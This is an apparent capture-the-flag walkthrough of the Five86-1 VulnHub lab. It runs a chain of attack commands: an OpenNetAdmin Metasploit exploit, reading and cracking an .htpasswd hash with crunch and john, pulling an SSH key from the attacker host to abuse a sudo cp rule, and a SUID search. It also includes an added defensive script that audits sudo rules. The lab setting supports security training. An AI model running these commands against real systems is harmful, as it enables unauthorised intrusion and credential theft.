Environment
Virtualization platform: Oracle VM VirtualBox
Attacker: Kali (IP: 192.168.56.102)
Target: Five86-1 (IP: 192.168.56.113)
Download: https://www.vulnhub.com/entry/five86-1,417/
Let’s go
nmap -A 192.168.56.113
The scan reveals an ona directory; browse to it.
searchsploit OpenNetAdmin 18.1.1
cp /usr/share/exploitdb/exploits/php/webapps/47772.rb .
mv 47772.rb /usr/share/metasploit-framework/modules/exploits/
msfconsole
use exploit/47772
set rhosts 192.168.56.113
set lhost 192.168.56.102
run
cd /var/www
cat .htpasswd
We need to crack the hash; the password is 10 characters long and uses the character set aefhrt.
crunch 10 10 aefhrt > passwd
echo 'douglas:$apr1$9fgG/hiM$BtsL9qpNHUlylaLxk81qY1' > hash
john --wordlist=/root/passwd hash
ssh douglas@192.168.56.113
sudo -l
We can copy a public key into jen's .ssh folder.
cd /tmp/
wget http://192.168.56.102/authorized_keys
sudo -u jen /bin/cp authorized_keys /home/jen/.ssh
ssh jen@192.168.56.113
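From the defender's side, the rule that makes this step work (douglas may run /bin/cp as jen) is the kind of sudoers entry an audit should flag. The script below is an added example, not part of the original write-up: it reads sudo -l output on stdin and reports rules that allow a file-writing utility under another account. The sample output, the WRITERS list and the function names are constructed for illustration.

```sh
#!/bin/sh
# Added example (not from the original write-up): flag sudo rules that let a
# user run a file-writing utility as another account.
# Input: text in the format printed by `sudo -l`.

# Utilities that can create or overwrite caller-chosen files.
# Illustrative list (an assumption); extend it for your environment.
WRITERS="cp mv tee dd install rsync tar ln"

audit_sudo_rules() {
    awk -v writers="$WRITERS" '
    BEGIN { n = split(writers, w, " "); for (i = 1; i <= n; i++) risky[w[i]] = 1 }
    # Rule lines look like:  (runas) [TAG:] /path/cmd [args], /path/cmd2
    /^[ \t]*\(/ {
        line = $0
        sub(/^[ \t]*\(/, "", line)
        runas = line; sub(/\).*/, "", runas)      # account the command runs as
        sub(/^[^)]*\)[ \t]*/, "", line)           # drop the "(runas)" prefix
        # Strip tags such as NOPASSWD: or SETENV:
        while (match(line, /^[A-Z_]+:[ \t]*/)) line = substr(line, RLENGTH + 1)
        m = split(line, cmds, /,[ \t]*/)
        for (j = 1; j <= m; j++) {
            split(cmds[j], parts, " ")
            path = parts[1]
            base = path; sub(/.*\//, "", base)    # basename of the command
            if (base in risky) printf "RISKY runas=%s cmd=%s\n", runas, path
        }
    }'
}

# Constructed sample resembling `sudo -l` output for the rule used above.
sample_sudo_l() {
    cat <<'EOF'
User douglas may run the following commands on five86-1:
    (jen) NOPASSWD: /bin/cp
    (root) /usr/bin/systemctl status apache2
EOF
}

sample_sudo_l | audit_sudo_rules
```

On a live host, pipe the output of sudo -l -U <user> into audit_sudo_rules for each account under review.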
cat /var/mail/jen
The mail says that user moss's password has been changed to Fire!Fire!
su moss
find / -perm -u=s -type f 2>/dev/null
./.games/upyourgame